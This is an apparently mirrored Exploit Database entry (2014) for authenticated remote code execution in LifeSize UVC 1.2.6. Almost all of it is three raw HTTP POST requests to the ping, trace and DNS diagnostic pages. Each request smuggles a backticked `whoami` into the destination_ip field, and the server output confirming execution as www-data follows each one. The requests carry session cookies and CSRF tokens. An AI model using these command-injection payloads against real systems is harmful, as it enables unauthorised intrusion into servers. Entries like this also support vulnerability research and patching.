LifeSize UVC 1.2.6 – (Authenticated) Remote Code Execution

• Exploit Database
• 10 阅读

• 作者： Brandon Perry
  日期： 2014-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32437/

• LifeSize UVC 1.2.6 authenticated vulnerabilities
   
  RCE as www-data:
   
  POST /server-admin/operations/diagnose/ping/ HTTP/1.1
  Host: 172.31.16.99
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
  Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 118
   
  csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
   
  The above POST results in a response containing:
  <span class="red_txt">ping: unknown host goowww-datagle.com</span><br/>
   
   
   
   
   
  RCE as www-data:
   
  POST /server-admin/operations/diagnose/trace/ HTTP/1.1
  Host: 172.31.16.99
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/
  Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 101
   
  csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com
   
  Results in the following error:
  gowww-dataogle.com: Name or service not known
   
   
   
   
   
   
  RCE as www-data:
   
  POST /server-admin/operations/diagnose/dns/ HTTP/1.1
  Host: 172.31.16.99
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/
  Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 116
   
  csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY
   
  Results in the following results:
  ; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99
  ;; global options: +cmd
  ;; Got answer:
  ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663
  ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
   
  ;; QUESTION SECTION:
  ;gowww-dataogle.com. IN ANY
   
  ;; AUTHORITY SECTION:
  com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400
   
  ;; Query time: 21 msec
  ;; SERVER: 8.8.8.8#53(8.8.8.8)
  ;; WHEN: Fri Mar 21 10:26:21 2014
  ;; MSG SIZE rcvd: 109